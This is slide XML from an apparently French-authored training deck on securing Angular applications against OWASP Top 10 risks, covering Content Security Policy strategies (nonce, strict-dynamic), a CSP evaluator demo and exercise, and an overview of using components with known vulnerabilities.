                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t>CSP 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t>« </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
                        <a:t>http:… https:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t>… »</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t>« nonce-{</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
                        <a:t>random</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t>} »</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t>« strict-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
                        <a:t>dynamic</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t> » </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>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white-list strategy</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
                        <a:t>random</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t> id </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
                        <a:t>associated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
                        <a:t>with</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t> script blocks</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
                        <a:t>propagates</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t> trust to « </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
                        <a:t>nonced</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t> » blocks</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>Unsecure, easily </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>bypassable</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>restrictive </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>with</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>trusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>external</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>resources</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
                        <a:t>with</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t> nonce, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
                        <a:t>security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
                        <a:t> &amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
                        <a:t>flexibility</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555776" y="1131590"/>
            <a:ext cx="3312368" cy="1584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859417" y="1131590"/>
            <a:ext cx="3284583" cy="1584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0826" y="1097548"/>
            <a:ext cx="3312368" cy="1584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37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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	CSP</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07504" y="771550"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Backwards </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>compatibility with “strict-dynamic”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>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33" y="1131590"/>
            <a:ext cx="7442870" cy="848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01" y="2168454"/>
            <a:ext cx="6083995" cy="824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7301" y="3925047"/>
            <a:ext cx="6121751" cy="870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7301" y="3003798"/>
            <a:ext cx="6323243" cy="910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043" y="2211710"/>
            <a:ext cx="1051404" cy="619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043" y="3174349"/>
            <a:ext cx="1108959" cy="549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7276" y="4082006"/>
            <a:ext cx="1026491" cy="556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067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51670"/>
            <a:ext cx="8208912" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSP evaluator </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20761982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Grp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="582084" y="987574"/>
            <a:ext cx="7367840"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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="6869072" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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699542"/>
            <a:ext cx="7606889"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932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SP_demo - juin 08 2017 12.30.4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4694" y="34970"/>
            <a:ext cx="8229600" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264773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915566"/>
            <a:ext cx="8856984" cy="3024336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PW - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Exercises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>	Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>practical_works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>/PW-CSP.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40179063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51670"/>
            <a:ext cx="8208912" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Third party components with known vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(A9)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11441381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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="771550"/>
            <a:ext cx="9001000" cy="3888432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="500" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0" smtClean="0"/>
              <a:t>"Using Components with Known Vulnerabilities"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0" smtClean="0"/>
              <a:t>A9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>) is ranked nine in the « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t> »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>Components </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(libraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, frameworks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>,…) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>run with the same privileges as the application. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>a vulnerable component </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>exploited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>, such an attack can facilitate serious data loss or server takeover. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" dirty="0"/>
              <a:t>Scope : </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1300" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Server-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>frameworks &amp; applications (J2EE/Spring applications, SOA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>batchs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t>Client-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1"/>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t> &amp; applications (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1"/>
              <a:t>webapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t>, SPA, JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t>, …)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1"/>
              <a:t>Proprietary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t> &amp; Open source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>products</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>projects</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Examples  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>commons-collection (&lt; 3.2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>commons-file-upload (&lt; 1.3.1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>XSS vulnerability in JQuery (&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>3.x.x)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
